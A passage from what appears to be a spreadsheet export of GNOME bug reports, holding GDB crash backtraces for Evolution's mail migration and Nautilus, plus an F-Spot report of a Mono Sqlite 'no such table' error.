/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX
    dest=0x81504f0
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX)
at em-migrate.c:1362
#7  0x41668505 in cp_r (
    src=0x81ae9f8
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders 
    dest=0x8160f08
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com/folders) at
em-migrate.c:1360
#8  0x41668505 in cp_r (
    src=0x815ef08
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com 
    dest=0x815cb98
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com)
    at em-migrate.c:1360
#9  0x41668505 in cp_r (src=0x815e088 /home/xkahn/evolution/mail/imap
    dest=0x815edc8 /home/xkahn/.evolution/mail/imap) at
em-migrate.c:1360
#10 0x41669b89 in em_migrate_imap_caches_1_4 (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution ex=0xbfffd2b8)
    at em-migrate.c:1919
#11 0x4166aa28 in em_migrate_1_4 (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution filters=0x8138e48
    vfolders=0x8146420 ex=0xbfffd2b8) at em-migrate.c:2224
#12 0x4166b0f3 in em_migrate (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution major=1 minor=4
    revision=0 ex=0xbfffd2b8) at em-migrate.c:2397
#13 0x416804ca in impl_upgradeFromVersion (servant=0x8070a44 major=1 
    minor=4 revision=0 ev=0xbfffd3e0) at mail-component.c:677
#14 0x4001c305 in
_ORBIT_skel_small_GNOME_Evolution_Component_upgradeFromVersion
(_o_servant=0x8070a44 _o_retval=0xbfffd399 _o_args=0xbfffd380
_o_ctx=0x0 
    _o_ev=0xbfffd3e0 
    _impl_upgradeFromVersion=0x41680467 )
    at Evolution-common.c:24
#15 0x4066b1af in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
#16 0x4001d92f in GNOME_Evolution_Component_upgradeFromVersion (
    _obj=0x8155620 major=1 minor=4 revision=0 ev=0xbfffd3e0)
    at Evolution-stubs.c:22
#17 0x080620ad in e_shell_attempt_upgrade (shell=0x80e5e78 major=1
minor=4 
    revision=0) at e-shell.c:687
#18 0x08061c15 in attempt_upgrade (shell=0x80e5e78) at e-shell.c:534
#19 0x08061e04 in e_shell_construct (shell=0x80e5e78 
    iid=0x806d320 OAFIID:GNOME_Evolution_Shell:1.5 
    startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG) at
e-shell.c:585
#20 0x08061f0c in e_shell_new (
    startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG 
    construct_result_return=0xbfffd52c) at e-shell.c:635
#21 0x08066304 in idle_cb (data=0x0) at main.c:371
#22 0x40f8fc74 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#23 0x40f8d4c2 in unblock_source () from /usr/lib/libglib-2.0.so.0
#24 0x40f8e3f1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#25 0x40f8e6f7 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#26 0x40f8ed56 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#27 0x405912e1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#28 0x08066a7d in main (argc=2 argv=0xbfffd824) at main.c:600
#29 0x42015704 in __libc_start_main () from /lib/tls/libc.so.6
Thread 1 (Thread 1094491680 (LWP 12243)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4046cfb1 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x0806659c in segv_redirect (sig=11) at main.c:456
No locals.
#3  
No symbol table info available.
#4  0x40c01c18 in gtk_progress_bar_set_fraction ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x41667b53 in em_migrate_set_folder_name (
    folder_name=0x813e300
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX/2255.)
at em-migrate.c:1116
	text = 0x815ca50 \b\005\023\b\034
#6  0x4166851a in cp_r (
    src=0x80aa550
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX
    dest=0x81504f0
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX)
at em-migrate.c:1362
	srcpath = (GString *) 0x81a9d84
	destpath = (GString *) 0x81a9d90
	dent = (struct dirent *) 0x81b8cf4
	slen = 71
	dlen = 72
	st = {st_dev = 770 __pad1 = 0 st_ino = 2322206 st_mode = 33152 
  st_nlink = 1 st_uid = 1031 st_gid = 1031 st_rdev = 12510 __pad2 =
0 
  st_size = 2973 st_blksize = 4096 st_blocks = 8 st_atim = {
    tv_sec = 1076343500 tv_nsec = 0} st_mtim = {tv_sec = 1047084611 
    tv_nsec = 0} st_ctim = {tv_sec = 1053400571 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
	dir = (DIR *) 0x81b8cb8
#7  0x41668505 in cp_r (
    src=0x81ae9f8
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders 
    dest=0x8160f08
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com/folders) at
em-migrate.c:1360
	srcpath = (GString *) 0x81a9d6c
	destpath = (GString *) 0x81a9d78
	dent = (struct dirent *) 0x81b7cd4
	slen = 65
	dlen = 66
	st = {st_dev = 770 __pad1 = 0 st_ino = 2322205 st_mode = 16832 
  st_nlink = 4 st_uid = 1031 st_gid = 1031 st_rdev = 0 __pad2 = 0 
  st_size = 24576 st_blksize = 4096 st_blocks = 48 st_atim = {
    tv_sec = 1080810677 tv_nsec = 0} st_mtim = {tv_sec = 1048819284 
    tv_nsec = 0} st_ctim = {tv_sec = 1053400739 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
	dir = (DIR *) 0x81b7c98
#8  0x41668505 in cp_r (
    src=0x815ef08
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com 
    dest=0x815cb98
/home/xkahn/.evolution/mail/imap/xkahn@peabody.ximian.com)
    at em-migrate.c:1360
	srcpath = (GString *) 0x80a9608
	destpath = (GString *) 0x81a9d60
	dent = (struct dirent *) 0x80ed95c
	slen = 57
	dlen = 58
	st = {st_dev = 770 __pad1 = 0 st_ino = 1177612 st_mode = 16832 
  st_nlink = 3 st_uid = 1031 st_gid = 1031 st_rdev = 0 __pad2 = 0 
  st_size = 4096 st_blksize = 4096 st_blocks = 8 st_atim = {
    tv_sec = 1080810677 tv_nsec = 0} st_mtim = {tv_sec = 1032986617 
    tv_nsec = 0} st_ctim = {tv_sec = 1053400739 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
	dir = (DIR *) 0x80ed8e8
#9  0x41668505 in cp_r (src=0x815e088 /home/xkahn/evolution/mail/imap
    dest=0x815edc8 /home/xkahn/.evolution/mail/imap) at
em-migrate.c:1360
	srcpath = (GString *) 0x80a95f0
	destpath = (GString *) 0x80a95fc
	dent = (struct dirent *) 0x8151364
	slen = 32
	dlen = 33
	st = {st_dev = 770 __pad1 = 0 st_ino = 3516044 st_mode = 16832 
  st_nlink = 3 st_uid = 1031 st_gid = 1031 st_rdev = 0 __pad2 = 0 
  st_size = 4096 st_blksize = 4096 st_blocks = 8 st_atim = {
    tv_sec = 1080810677 tv_nsec = 0} st_mtim = {tv_sec = 1032986617 
    tv_nsec = 0} st_ctim = {tv_sec = 1053400739 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
	dir = (DIR *) 0x8151328
#10 0x41669b89 in em_migrate_imap_caches_1_4 (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution ex=0xbfffd2b8)
    at em-migrate.c:1919
	src = 0x815e088 /home/xkahn/evolution/mail/imap
	dest = 0x815edc8 /home/xkahn/.evolution/mail/imap
	st = {st_dev = 770 __pad1 = 0 st_ino = 2453297 st_mode = 16832 
  st_nlink = 7 st_uid = 1031 st_gid = 1031 st_rdev = 0 __pad2 = 0 
  st_size = 4096 st_blksize = 4096 st_blocks = 8 st_atim = {
    tv_sec = 1080810677 tv_nsec = 0} st_mtim = {tv_sec = 1069169975 
    tv_nsec = 0} st_ctim = {tv_sec = 1069169975 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
#11 0x4166aa28 in em_migrate_1_4 (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution filters=0x8138e48
    vfolders=0x8146420 ex=0xbfffd2b8) at em-migrate.c:2224
	session = (EMMigrateSession *) 0x814fe40
	lex = {id = CAMEL_EXCEPTION_NONE desc = 0x0}
	st = {st_dev = 770 __pad1 = 0 st_ino = 3826471 st_mode = 33152 
  st_nlink = 1 st_uid = 1031 st_gid = 1031 st_rdev = 0 __pad2 = 0 
  st_size = 4280 st_blksize = 4096 st_blocks = 16 st_atim = {
    tv_sec = 1080934669 tv_nsec = 0} st_mtim = {tv_sec = 1080917693 
    tv_nsec = 0} st_ctim = {tv_sec = 1080917694 tv_nsec = 0}
__unused4 = 0 
  __unused5 = 0}
	path = 0x815edc8 /home/xkahn/.evolution/mail/imap
#12 0x4166b0f3 in em_migrate (
    evolution_dir=0x8070ad8 /home/xkahn/.evolution major=1 minor=4
    revision=0 ex=0xbfffd2b8) at em-migrate.c:2397
	config_xmldb = 0x0
	filters = 0x8138e48
	vfolders = 0x8146420
	st = {st_dev = 4611901109315818096 __pad1 = 30308 st_ino = 1 
  st_mode = 1 st_nlink = 1073791903 st_uid = 135165540 st_gid = 1 
  st_rdev = 4611833859791650817 __pad2 = 59810 st_size = 1074658965 
  st_blksize = 1080619392 st_blocks = 1097765628 st_atim = {tv_sec =
1613 
    tv_nsec = 1096967722} st_mtim = {tv_sec = 1096931600 
    tv_nsec = 1097760004} st_ctim = {tv_sec = 134910128 
    tv_nsec = 1090318928} __unused4 = 3221213912 __unused5 =
1073791680}
	path = 0x8138cb8 email://local@local/Drafts
#13 0x416804ca in impl_upgradeFromVersion (servant=0x8070a44 major=1 
    minor=4 revision=0 ev=0xbfffd3e0) at mail-component.c:677
	component = (MailComponent *) 0x8070a30
	ex = {id = CAMEL_EXCEPTION_NONE desc = 0x0}
	ok = -1073753304
#14 0x4001c305 in
_ORBIT_skel_small_GNOME_Evolution_Component_upgradeFromVersion
(_o_servant=0x8070a44 _o_retval=0xbfffd399 _o_args=0xbfffd380
_o_ctx=0x0 
    _o_ev=0xbfffd3e0 
    _impl_upgradeFromVersion=0x41680467 )
    at Evolution-common.c:24
No locals.
#15 0x4066b1af in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#16 0x4001d92f in GNOME_Evolution_Component_upgradeFromVersion (
    _obj=0x8155620 major=1 minor=4 revision=0 ev=0xbfffd3e0)
    at Evolution-stubs.c:22
	_ORBIT_retval = 0 '\0'
	_args = {0xbfffd39e 0xbfffd39c 0xbfffd39a}
#17 0x080620ad in e_shell_attempt_upgrade (shell=0x80e5e78 major=1
minor=4 
    revision=0) at e-shell.c:687
	info = (const EComponentInfo *) 0x80b2228
	ev = {_id = 0x0 _major = 0 _any = {_type = 0x0 _value = 0x0 
    _release = 0 '\0'}}
	component_upgraded = 135160160
	component_infos = (GSList *) 0x80b4908
	p = (GSList *) 0x80b4908
	current_major = 1
	current_minor = 5
	current_revision = 5
	success = 1
#18 0x08061c15 in attempt_upgrade (shell=0x80e5e78) at e-shell.c:534
	gconf_client = (GConfClient *) 0x8091328
	major = 1
	minor = 4
	revision = 0
#19 0x08061e04 in e_shell_construct (shell=0x80e5e78 
    iid=0x806d320 OAFIID:GNOME_Evolution_Shell:1.5 
    startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG) at
e-shell.c:585
	priv = (EShellPrivate *) 0x80e5f38
	corba_object = 0x814c238
	start_online = -1073752904
#20 0x08061f0c in e_shell_new (
    startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG 
    construct_result_return=0xbfffd52c) at e-shell.c:635
	new = (EShell *) 0x80e5e78
	priv = (EShellPrivate *) 0x8084030
	construct_result = 1080398844
#21 0x08066304 in idle_cb (data=0x0) at main.c:371
	uri_list = (GSList *) 0x0
	corba_shell = 0x0
	ev = {_id = 0x0 _major = 0 _any = {_type = 0x0 _value = 0x0 
    _release = 0 '\0'}}
	result = E_SHELL_CONSTRUCT_RESULT_OK
	startup_line_mode = E_SHELL_STARTUP_LINE_MODE_CONFIG
	have_evolution_uri = 0
#22 0x40f8fc74 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#23 0x40f8d4c2 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#24 0x40f8e3f1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0x40f8e6f7 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x40f8ed56 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x405912e1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#28 0x08066a7d in main (argc=2 argv=0xbfffd824) at main.c:600
	options = {{longName = 0x806e4d2 component shortName = 99 'c' 
    argInfo = 1 arg = 0x806fc10 val = 0 
    descrip = 0x806e4e0 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x806e513 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x806fc00 val = 0 
    descrip = 0x806e51b Start in offline mode argDescrip = 0x0} {
    longName = 0x806e531 online shortName = 0 '\0' argInfo = 0 
    arg = 0x806fbfc val = 0 descrip = 0x806e538 Start in online
mode 
    argDescrip = 0x0} {longName = 0x806e54d force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fc08 val = 0 
    descrip = 0x806e560 Forcibly shut down all evolution components 
    argDescrip = 0x0} {longName = 0x806e58c force-migrate 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fc0c val = 0 
    descrip = 0x806e5a0 Forcibly re-migrate from Evolution 1.4 
    argDescrip = 0x0} {longName = 0x806e5c7 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x806fc14 val = 0 
    descrip = 0x806e5e0 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x806e617 setup-only
shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x80
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>F-SPOT-156847</t>
  </si>
  <si>
    <t>f-spot crash when execute in Gentoo Linux 2004.2</t>
  </si>
  <si>
    <t>I'm compiled the source code in Gentoo and I can't execute the program
open a window and inmediatly close the window and crash.
Steps to reproduce the problem:
1.With the source code of 0.0.2 version....   ./configure
2. make
3. ./src/f-spot
Actual Results:
There is the trackback...
Unhandled Exception: System.ApplicationException: Sqlite error no such
table: photos
in [0x000d8] (at
/cvs/mcs/class/Mono.Data.SqliteClient/Mono.Data.SqliteClient/SqliteCommand.cs:255)
Mono.Data.SqliteClient.SqliteCommand:ExecuteReader
(System.Data.CommandBehaviorboolint&amp;)
in [0x00005] (at
/cvs/mcs/class/Mono.Data.SqliteClient/Mono.Data.SqliteClient/SqliteCommand.cs:209)
Mono.Data.SqliteClient.SqliteCommand:ExecuteReader
(System.Data.CommandBehavior)
in [0x00002] (at
/cvs/mcs/class/Mono.Data.SqliteClient/Mono.Data.SqliteClient/SqliteCommand.cs:203)
Mono.Data.SqliteClient.SqliteCommand:ExecuteReader ()
in [0x001ec] (at /home/admin/f-spot-0.0.2/src/PhotoStore.cs:1045)
PhotoStore:Query (Tag[]PhotoStore/DateRange)
in [0x0001d] (at /home/admin/f-spot-0.0.2/src/PhotoQuery.cs:29)
PhotoQuery:.ctor (PhotoStore)
in [0x0017a] (at /home/admin/f-spot-0.0.2/src/MainWindow.cs:143)
MainWindow:.ctor (Db)
in [0x00080] (at /home/admin/f-spot-0.0.2/src/main.cs:30) Driver:Main
(string[])
Additional Information:
I'm using Gentoo Linux 2004.2 with:
Mono JIT compiler version 1.0 (C) 2002-2004 Novell Inc and
Contributors. www.go-mono.com
        TLS:           normal
        GC:            Included Boehm (with typed GC)
        SIGSEGV      : normal
        Globalization: ICU
sqlite versions I'm tried...
2.8.14
3.0.7</t>
  </si>
  <si>
    <t>julio</t>
  </si>
  <si>
    <t>NAUTILUS-383946</t>
  </si>
  <si>
    <t>crash: Inserting an MMC (in gtk_menu_tool_button_set_menu at gtkmenutoolbutton.c:554)</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Inserting an MMC into a card reader
Distribution: Fedora Core release 6 (Rawhide)
Gnome Release: 2.17.2 2006-11-07 (Red Hat Inc)
BugBuddy Version: 2.17.2
System: Linux 2.6.18-1.2849.fc6 #1 SMP Fri Nov 10 12:45:28 EST 2006 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70101000
Selinux: Enforcing
Accessibility: Disabled
Memory status: size: 74268672 vsize: 0 resident: 74268672 share: 0 rss: 15597568 rss_rlim: 0
CPU usage: start_time: 1165634526 rtime: 0 utime: 57 stime: 0 cutime:49 cstime: 0 timeout: 8 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/nautilus'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1208812800 (LWP 12486)]
0x00c1b402 in __kernel_vsyscall ()
#0  0x00c1b402 in __kernel_vsyscall ()
#1  0x45618b8b in waitpid () from /lib/libpthread.so.0
#2  0x4694d642 in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x45b6eec2 in IA__gtk_menu_tool_button_set_menu (button=0x88b2150 
    menu=0x877c928) at gtkmenutoolbutton.c:554
#5  0x0807aea6 in connect_proxy (action=0x88c6378 proxy=0x88b2150)
    at nautilus-navigation-action.c:200
#6  0x45a7f1b8 in IA__gtk_action_create_tool_item (action=0x88c6378)
    at gtkaction.c:933
#7  0x45c6c80c in update_node (self=0x88cfa78 node=0x868cac8 
    in_popup=) at gtkuimanager.c:2459
#8  0x45c6c0b0 in update_node (self=0x88cfa78 node=0x868cab0 
    in_popup=) at gtkuimanager.c:2571
#9  0x45c6c0b0 in update_node (self=0x88cfa78 node=0x8689968 
    in_popup=) at gtkuimanager.c:2571
#10 0x45c6d018 in do_updates (self=0x88cfa78) at gtkuimanager.c:2613
#11 0x45c6d7f2 in gtk_ui_manager_real_get_widget (self=0x88cfa78 
    path=0x813d8d4 /Toolbar) at gtkuimanager.c:452
#12 0x45c6ebb3 in IA__gtk_ui_manager_get_widget (self=0x88cfa78 
    path=0x813d8d4 /Toolbar) at gtkuimanager.c:724
#13 0x0807dac2 in nautilus_navigation_window_instance_init (window=0x87bce80)
    at nautilus-navigation-window.c:233
#14 0x4583164a in g_type_create_instance () from /lib/libgobject-2.0.so.0
#15 0x45818f32 in g_object_set () from /lib/libgobject-2.0.so.0
#16 0x0809b443 in nautilus_window_constructor (type=142248848 
    n_construct_properties=3 construct_params=0x88d9288)
    at nautilus-window.c:656
#17 0x45816b8b in g_object_newv () from /lib/libgobject-2.0.so.0
#18 0x45817799 in g_object_new_valist () from /lib/libgobject-2.0.so.0
#19 0x45c7be58 in IA__gtk_widget_new (type=142248848 
    first_property_name=0x8138e4d app) at gtkwidget.c:2018
#20 0x08068718 in create_window (application=0x8664d90 window_type=142248848 
    startup_id= screen=0x865b0b0)
    at nautilus-application.c:985
#21 0x08068847 in nautilus_application_create_navigation_window (
    application=0x8664d90 startup_id=0x0 screen=0x865b0b0)
    at nautilus-application.c:1211
#22 0x08096c03 in nautilus_window_open_location_full (window=0x86b1810 
    location=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0 new_selection=0x0)
    at nautilus-window-manage-views.c:530
#23 0x08129e3e in nautilus_window_info_open_location (window=0x86b1810 
    location=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0 selection=0x0)
    at nautilus-window-info.c:163
#24 0x080a6f5a in open_location (directory_view=0x8738af0 
    new_uri=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0)
    at fm-directory-view.c:834
#25 0x080a9f06 in activate_callback (files=0x88ce540 callback_data=0x8705b50)
    at fm-directory-view.c:8448
#26 0x080f6975 in file_list_file_ready_callback (file=0x86abae8 
    user_data=0x876c628) at nautilus-file.c:6083
#27 0x080e1c07 in ready_callback_call (directory=0x87bcd98 callback=0x86be988)
    at nautilus-directory-async.c:1265
#28 0x080e3e0a in call_ready_callbacks_at_idle (callback_data=0x87bcd98)
    at nautilus-directory-async.c:1883
#29 0x45792491 in g_source_is_destroyed () from /lib/libglib-2.0.so.0
#30 0x457941f2 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
#31 0x457971cf in g_main_context_check () from /lib/libglib-2.0.so.0
#32 0x45797579 in g_main_loop_run () from /lib/libglib-2.0.so.0
#33 0x45b5ac24 in IA__gtk_main () at gtkmain.c:1001
#34 0x0807a400 in main (argc=143262072 argv=0xbfe216f4) at nautilus-main.c:389
#35 0x4549ee5c in __libc_start_main (main=0x8079e60  argc=4 
    ubp_av=0xbfe216f4 init=0x81383d0  
    fini=0x81383c0  rtld_fini=0x45478490  
    stack_end=0xbfe216ec) at libc-start.c:222
#36 0x08064bd1 in _start ()
Thread 1 (Thread -1208812800 (LWP 12486)):
#0  0x00c1b402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x45618b8b in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#2  0x4694d642 in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x45b6eec2 in IA__gtk_menu_tool_button_set_menu (button=0x88b2150 
    menu=0x877c928) at gtkmenutoolbutton.c:554
	priv = (GtkMenuToolButtonPrivate *) 0x88b21e0
	__PRETTY_FUNCTION__ = IA__gtk_menu_tool_button_set_menu
#5  0x0807aea6 in connect_proxy (action=0x88c6378 proxy=0x88b2150)
    at nautilus-navigation-action.c:200
	menu = (GtkWidget *) 0x877c928
#6  0x45a7f1b8 in IA__gtk_action_create_tool_item (action=0x88c6378)
    at gtkaction.c:933
	button = (GtkWidget *) 0x88b2150
	__PRETTY_FUNCTION__ = IA__gtk_action_create_tool_item
#7  0x45c6c80c in update_node (self=0x88cfa78 node=0x868cac8 
    in_popup=) at gtkuimanager.c:2459
	toolbar = 
	pos = 
	child = 
	action = (GtkAction *) 0x88c6378
	action_name = 
	__PRETTY_FUNCTION__ = update_node
#8  0x45c6c0b0 in update_node (self=0x88cfa78 node=0x868cab0 
    in_popup=) at gtkuimanager.c:2571
	menu = 
	siblings = (GList *) 0x0
	child = (GNode *) 0x0
	action = (GtkAction *) 0x0
	action_name = (const gchar *) 0x0
	__PRETTY_FUNCTION__ = update_node
#9  0x45c6c0b0 in update_node (self=0x88cfa78 node=0x8689968 
    in_popup=) at gtkuimanager.c:2571
	menu = 
	siblings = (GList *) 0x0
	child = (GNode *) 0x0
	action = (GtkAction *) 0x0
	action_name = (const gchar *) 0x0
	__PRETTY_FUNCTION__ = update_node
#10 0x45c6d018 in do_updates (self=0x88cfa78) at gtkuimanager.c:2613
No locals.
#11 0x45c6d7f2 in gtk_ui_manager_real_get_widget (self=0x88cfa78 
    path=0x813d8d4 /Toolbar) at gtkuimanager.c:452
	node = 
#12 0x45c6ebb3 in IA__gtk_ui_manager_get_widget (self=0x88cfa78 
    path=0x813d8d4 /Toolbar) at gtkuimanager.c:724
	__PRETTY_FUNCTION__ = IA__gtk_ui_manager_get_widget
#13 0x0807dac2 in nautilus_navigation_window_instance_init (window=0x87bce80)
    at nautilus-navigation-window.c:233
	ui_manager = (GtkUIManager *) 0x45b6ea40
	toolbar = 
	location_bar = (GtkWidget *) 0x8708e48
	view_as_menu_vbox = 
	item = 
	hbox = (GtkWidget *) 0x45847674
	vbox = (GtkWidget *) 0x8720070
	eventbox = (GtkWidget *) 0x8720110
	extras_vbox = 
#14 0x4583164a in g_type_create_instance () from /lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x45818f32 in g_object_set () from /lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x0809b443 in nautilus_window_constructor (type=142248848 
    n_construct_properties=3 construct_params=0x88d9288)
    at nautilus-window.c:656
	object = 
#17 0x45816b8b in g_object_newv () from /lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x45817799 in g_object_new_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x45c7be58 in IA__gtk_widget_new (type=142248848 
    first_property_name=0x8138e4d app) at gtkwidget.c:2018
	widget = 
	var_args = 0xbfe210a8 \220Mf\bF\216\023\bÂ°Â°e\b
	__PRETTY_FUNCTION__ = IA__gtk_widget_new
#20 0x08068718 in create_window (application=0x8664d90 window_type=142248848 
    startup_id= screen=0x865b0b0)
    at nautilus-application.c:985
	window = 
	__PRETTY_FUNCTION__ = create_window
#21 0x08068847 in nautilus_application_create_navigation_window (
    application=0x8664d90 startup_id=0x0 screen=0x865b0b0)
    at nautilus-application.c:1211
	window = 
	geometry_string = 
	maximized = 
	__PRETTY_FUNCTION__ = nautilus_application_create_navigation_window
#22 0x08096c03 in nautilus_window_open_location_full (window=0x86b1810 
    location=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0 new_selection=0x0)
    at nautilus-window-manage-views.c:530
	__t = 
	__r = 
	target_window = 
	do_load_location = 
	__PRETTY_FUNCTION__ = nautilus_window_open_location_full
#23 0x08129e3e in nautilus_window_info_open_location (window=0x86b1810 
    location=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0 selection=0x0)
    at nautilus-window-info.c:163
	__PRETTY_FUNCTION__ = nautilus_window_info_open_location
#24 0x080a6f5a in open_location (directory_view=0x8738af0 
    new_uri=0x8774f20 computer:/// 
    mode=NAUTILUS_WINDOW_OPEN_ACCORDING_TO_MODE flags=0)
    at fm-directory-view.c:834
	file = (NautilusFile *) 0x86abae8
	__PRETTY_FUNCTION__ = open_location
#25 0x080a9f06 in activate_callback (files=0x88ce540 callback_data=0x8705b50)
    at fm-directory-view.c:8448
	flags = 0
	parameters = 
	view = (FMDirectoryView *) 0x8738af0
	file = (NautilusFile *) 0x86abae8
	launch_desktop_files = (GList *) 0x0
	launch_from_command_files = (GList *) 0x0
	launch_files = (GList *) 0x0
	launch_in_terminal_files = (GList *) 0x0
	open_in_app_files = (GList *) 0x0
	open_in_app_parameters = 
	unhandled_open_in_app_files = 
	one_parameters = 
	open_in_view_files = (GList *) 0x88ca4b0
	l = 
	uri = 0x8774f20 computer:///
	executable_path = 0x863dcf0 \001
	quoted_path = 
	name = 
	old_working_dir = 0x0
	action = 
	screen = (GdkScreen *) 0x865b0b0
	__PRETTY_FUNCTION__ = activate_callback
#26 0x080f6975 in file_list_file_ready_callback (file=0x86abae8 
    user_data=0x876c628) at nautilus-file.c:6083
	data = (FileListReadyData *) 0x876c628
#27 0x080e1c07 in ready_callback_call (directory=0x87bcd98 callback=0x86be988)
    at nautilus-directory-async.c:1265
	file_list = 
#28 0x080e3e0a in call_ready_callbacks_at_idle (callback_data=0x87bcd98)
    at nautilus-directory-async.c:1883
	directory = (NautilusDirectory *) 0x87bcd98
	node = 
	next = 
	callback = (ReadyCallback *) 0x86be988
#29 0x45792491 in g_source_is_destroyed () from /lib/libglib-2.0.so.0
No symbol table info available.
#30 0x457941f2 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
No symbol table info available.
#31 0x457971cf in g_main_context_check () from /lib/libglib-2.0.so.0
No symbol table info available.
#32 0x45797579 in g_main_loop_run () from /lib/libglib-2.0.so.0
No symbol table info available.
#33 0x45b5ac24 in IA__gtk_main () at gtkmain.c:1001
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x0
	loop = (GMainLoop *) 0x868fcf0
#34 0x0807a400 in main (argc=143262072 argv=0xbfe216f4) at nautilus-main.c:389
	kill_shell = 0
	restart_shell = 0
	no_default_window = 1
	browser_window = 0
	no_desktop = 0
	startup_id = 
	startup_id_copy = 0x8668018 \001
	session_to_load = 0x0
	geometry = (gchar *) 0x0
	remaining = (const gchar **) 0x0
	context = 
	application = (NautilusApplication *) 0x8664d90
	program = (GnomeProgram *) 0x8647010
	options = {{long_name = 0x813f7a4 geometry short_name = 103 'g' 
    flags = 0 arg = G_OPTION_ARG_STRING arg_data = 0xbfe215c8 
    description = 0x813c8ac Create the initial window with the given geometry. arg_description = 0x813c705 GEOMETRY} {
    long_name = 0x813c70e no-default-window short_name = 110 'n' 
    flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0xbfe215d8 
    description = 0x813c8e0 Only create windows for explicitly specified URIs. arg_description = 0x0} {long_name = 0x813c720 no-desktop 
    short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0xbfe215d0 
    description = 0x813c914 Do not manage the desktop (ignore the preference set in the preferences dialog). arg_description = 0x0} {
    long_name = 0x813e833 browser short_name = 0 '\0' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0xbfe215d4 
    description = 0x813c72b open a browser window. arg_description = 0x0} {
    long_name = 0x813c888 quit short_name = 113 'q' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0xbfe215e0 
    description = 0x813c742 Quit Nautilus. arg_description = 0x0} {
    long_name = 0x813c88f restart short_name = 0 '\0' flags = 1 
    arg = G_OPTION_ARG_NONE arg_data = 0xbfe215dc 
    description = 0x813c751 Restart Nautilus. arg_description = 0x0} {
    long_name = 0x81408f8  short_name = 0 '\0' flags = 0 
